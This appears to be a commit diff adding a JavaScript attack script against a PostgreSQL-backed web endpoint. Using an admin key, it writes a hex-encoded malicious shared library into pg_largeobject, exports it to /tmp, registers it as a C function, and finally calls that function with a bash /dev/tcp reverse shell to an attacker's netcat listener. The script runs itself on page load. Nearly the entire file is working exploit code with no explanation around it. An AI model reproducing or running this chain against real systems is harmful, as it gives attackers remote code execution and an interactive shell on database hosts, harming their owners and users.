1+ var nc_ip = "192.168.1.XXX" ; //Attacker's netcat listener IP
2+ var nc_port = "4444" ; //Attacker's netcat listener port
3+ var url = "/vulnerable-path" ;
4+ var loid = 1337 ;
5+
6+ var udf = "<Add the database extension hex code here >" ; //xxd rev_shell.dll | cut -d" " -f 2-9 | sed 's/ //g' | tr -d '\n' > rev_shell.dll.txt
7+
8+ //Reference: https://book.hacktricks.xyz/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions
9+
10+ function make_request ( url , body ) {
11+ var resp ;
12+
13+ $ . ajax ( {
14+ url : url ,
15+ type : "POST" ,
16+ data : body ,
17+ headers : {
18+ 'Content-Type' : 'application/x-www-form-urlencoded'
19+ } ,
20+ async : false ,
21+ success : function ( responseText ) {
22+ resp = responseText ;
23+ }
24+ } ) ;
25+
26+ return resp ;
27+ }
28+
29+ function delete_lo ( ) {
30+ console . log ( "[+] Deleting existing LO..." ) ;
31+ body = "adminKey=" + admin_key + "&query=SELECT+lo_unlink%28" + loid + "%29" ;
32+ make_request ( url , body ) ;
33+ }
34+
35+ function create_lo ( ) {
36+ console . log ( "[+] Creating LO for UDF injection..." ) ;
37+ body = "adminKey=" + admin_key + "&query=SELECT+lo_import($$//etc//hostname$$," + loid + ")" ; //Linux specific path
38+ make_request ( url , body ) ;
39+ }
40+
41+ function inject_udf ( ) {
42+ console . log ( "[+] Injecting payload of length %d into LO..." ) ;
43+
44+ for ( let i = 0 ; i < ( ( udf . length - 1 ) / 4096 ) + 1 ; i ++ ) {
45+ var udf_chunk = udf . substring ( i * 4096 , ( i + 1 ) * 4096 ) ;
46+ if ( i == 0 ) {
47+ body = "adminKey=" + admin_key + "&query=UPDATE+PG_LARGEOBJECT+SET+data=decode($$" + udf_chunk + "$$,$$hex$$)+where+loid=" + loid + "+and+pageno=" + i + "" ;
48+ }
49+ else {
50+ body = "adminKey=" + admin_key + "&query=INSERT+INTO+PG_LARGEOBJECT+(loid,pageno,data)+VALUES+(" + loid + "," + i + ",decode($$" + udf_chunk + "$$,$$hex$$))" ;
51+ }
52+
53+ make_request ( url , body ) ;
54+ }
55+ }
56+
57+ function export_udf ( ) {
58+ console . log ( "[+] Exporting UDF library to filesystem..." ) ;
59+ body = "adminKey=" + admin_key + "&query=SELECT+lo_export(" + loid + ",$$//tmp//rev_shell.obj$$)" ;
60+ make_request ( url , body ) ;
61+ }
62+
63+ function create_udf_func ( ) {
64+ console . log ( "[+] Creating function..." ) ;
65+ body = "adminKey=" + admin_key + "&query=CREATE+FUNCTION+sys(cstring)+RETURNS+int+AS+'//tmp//rev_shell.obj',+'pg_exec'+LANGUAGE+C+STRICT" ;
66+ make_request ( url , body ) ;
67+ }
68+
69+ function trigger_udf ( ) {
70+ console . log ( "[+] Launching reverse shell..." ) ;
71+ body = "adminKey=" + admin_key + "&query=SELECT+sys('bash+-c+\"bash+-i+>%26+/dev/tcp/" + nc_ip + "/" + nc_port + "+0>%261\"')" ;
72+ make_request ( url , body ) ;
73+ }
74+
75+ function launch ( ) {
76+ delete_lo ( ) ;
77+ create_lo ( ) ;
78+ inject_udf ( ) ;
79+ export_udf ( ) ;
80+ create_udf_func ( ) ;
81+ trigger_udf ( ) ;
82+ }
83+
84+ //Slight dealay to let jquery load
85+ setTimeout ( launch , 50 ) ;
0 commit comments